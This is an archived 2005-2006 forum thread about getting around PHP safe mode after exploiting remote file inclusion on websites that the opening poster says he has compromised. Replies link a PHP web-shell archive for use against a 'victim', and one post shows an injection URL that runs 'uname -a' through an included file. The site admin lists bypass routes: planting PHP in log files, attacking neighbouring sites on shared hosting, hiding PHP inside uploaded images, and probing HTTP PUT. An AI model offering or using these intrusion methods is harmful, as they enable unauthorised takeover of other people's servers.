 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Safemode in PHP |
 |
 Posted: Thu Mar 17, 2005 8:07 pm |
 |
|
| zer0-c00l |
| Advanced user |
 |
|
| Joined: Jun 25, 2004 |
| Posts: 72 |
| Location: BRAZIL! |
|
|
 |
|
 |
|
Hi there...
i got many sites with remote file inclusion and has safemode in PHP...
somebody knows how to 'bypass' or other method to execute commands with safemode enabled? |
|
|
|
|
|
Re: Safemode in PHP |
|
| Posted: Fri Mar 18, 2005 7:47 am |
|
|
| LINUX |
| Moderator |
 |
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
| zer0-c00l wrote: | Hi there...
i got many sites with remote file inclusion and has safemode in PHP...
somebody knows how to 'bypass' or other method to execute commands with safemode enabled? |
yes here http://www.sosvulnerable.net/waraxe/php-shells.rar by pass safemode tool25 you need configure therules for fullpath you victim
and upload all files click in list on and safemode OWNED |
|
|
|
|
| Posted: Fri Mar 18, 2005 8:25 pm |
|
|
| zer0-c00l |
| Advanced user |
|
|
| Joined: Jun 25, 2004 |
| Posts: 72 |
| Location: BRAZIL! |
|
|
|
|
|
|
there is a lot of files into the .rar :S
can u tell me what i have to do to use?
maybe an example?
thanks  |
|
|
|
|
| Posted: Sat Mar 19, 2005 1:06 pm |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| zer0-c00l wrote: | there is a lot of files into the .rar :S
can u tell me what i have to do to use?
maybe an example?
thanks |
Read d manual
it wroten clearly there
---//snip---
file :readme.txt
Php shells for use remote and local for local rename*.php - for remote rename *.svs not php  (svs = sosvulnerable security) xD
----\\snip |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Sat Apr 02, 2005 4:37 pm |
|
|
| yame |
| Beginner |
|
|
| Joined: Apr 02, 2005 |
| Posts: 1 |
|
|
|
|
|
|
|
hey,
I get this a lot of times while testing a remote file inclusion bug ( I even used the tool25.doc error.php?dir=..../tool25.doc?&cmd=uname%20-a )
| Quote: |
Warning: main(): URL file-access is disabled in the server configuration in /home/.../error.php on line 1 |
is this also because of Safemode, or is it something else?
how can someone bypass this?
regards |
|
|
|
|
| Posted: Sat Apr 02, 2005 6:50 pm |
|
|
| murdock |
| Advanced user |
 |
|
| Joined: Mar 16, 2005 |
| Posts: 54 |
|
|
|
|
|
|
|
| Perhaps it has the option "allow_url_fopen" disabled in php.ini! |
|
|
|
|
|
|
|
|
| Posted: Sun Apr 03, 2005 10:14 am |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| yame wrote: | hey,
I get this a lot of times while testing a remote file inclusion bug ( I even used the tool25.doc error.php?dir=..../tool25.doc?&cmd=uname%20-a )
| Quote: |
Warning: main(): URL file-access is disabled in the server configuration in /home/.../error.php on line 1 |
is this also because of Safemode, or is it something else?
how can someone bypass this?
regards |
SAFEMODE restrict this function :
dbmopen()
dbase_open()
filepro()
filepro_rowcount()
filepro_retrieve()
ifx_*()
ingres_*()
mysql_*()
pg_loimport()
posix_mkfifo()
putenv()
move_uploaded_file()
chdir()
dl()
shell_exec()
exec()
system()
passthru()
popen()
mkdir()
rmdir()
rename()
unlink()
copy()
chgrp()
chown()
chmod()
touch()
symlink()
link()
getallheaders()
header()
PHP_AUTH variables
highlight_file()
Show_source()
parse_ini_file()
set_time_limit()
max_execution_time
... for more info read php manual
i suggest u to read .chm form |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
| Posted: Sun Apr 03, 2005 1:13 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| yame wrote: | hey,
I get this a lot of times while testing a remote file inclusion bug ( I even used the tool25.doc error.php?dir=..../tool25.doc?&cmd=uname%20-a )
| Quote: |
Warning: main(): URL file-access is disabled in the server configuration in /home/.../error.php on line 1 |
is this also because of Safemode, or is it something else?
how can someone bypass this?
regards |
Like murdock allready mentioned, it is the "allow_url_fopen" setting in php.ini, which will restrict remote inclusion possibilities, not the safe mode. So what to do and how to bypass? Some possible choices:
1. Using local files, for example some log files (if you can inject there php code)
2. if the server is virtual server and there is many webistes on same ip address (most of the hosting works that way), you can try take over some other site on same server and then use directory traversal between virtual site root directories.
3. pictures upload - all the image galleries and avatars and stuff - there is possibility to craft some valid jpg/gif/png/bmp picture, which will pass through all the checking routines and still it will contain some php code inside I have tested this on my local server and seems, that php parser is very sensitive about this kind of php code inclusion. But try to experiment with hex editor and finally it will work 
4. test apache/iis server directories against "PUT" http method. |
|
|
|
|
|
|
|
|
| Posted: Sun Apr 03, 2005 4:13 pm |
|
|
| LINUX |
| Moderator |
|
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
|
|
|
|
| Posted: Sun Apr 03, 2005 9:33 pm |
|
|
| sp3x |
| Valuable expert |
 |
|
| Joined: Feb 15, 2005 |
| Posts: 10 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Mon Apr 04, 2005 6:08 am |
|
|
| LINUX |
| Moderator |
|
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
|
|
|
|
| Posted: Thu Mar 23, 2006 1:07 pm |
|
|
| Classics |
| Regular user |
 |
|
| Joined: Mar 23, 2006 |
| Posts: 6 |
| Location: Nederland/Venlo |
|
|
|
|
|
|
Hi
i have the self Problems to , i use C99 Shell and RuSH Shell !
This Shell are very mighty , but not incredibly enough.
Please Upload your safemod tool new , the old links is 404 not found.
Thank you  |
|
|
|
|
| Posted: Thu Mar 23, 2006 1:10 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Classics wrote: | Hi
i have the self Problems to , i use C99 Shell and RuSH Shell !
This Shell are very mighty , but not incredibly enough.
Please Upload your safemod tool new , the old links is 404 not found.
Thank you |
Linux has changed his domain, here is new url:
http://www.securityhead.com/waraxe/php-shells.rar
|
|
|
|
|
|
Re: Safemode in PHP |
|
| Posted: Thu Apr 20, 2006 5:31 am |
|
|
| daemon_azazel |
| Regular user |
|
|
| Joined: Apr 16, 2006 |
| Posts: 17 |
|
|
|
|
|
|
|
| LINUX wrote: | by pass safemode tool25 you need configure therules for fullpath you victim
and upload all files click in list on and safemode OWNED |
have re-configured and uploaded on linux server with safemode on
and with open basedir restrictions on all other folders and the tool
did not worked - it wasn't able to execute any command and list
anything. |
|
|
|
|
| Posted: Sun Apr 23, 2006 7:40 pm |
|
|
| outlawsys |
| Regular user |
|
|
| Joined: Jun 11, 2005 |
| Posts: 12 |
|
|
|
|
|
|
|
| You can bypass safemod with an .cgi script so you can execute command. |
|
|
|
|
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 227
Members: 0
Total: 227
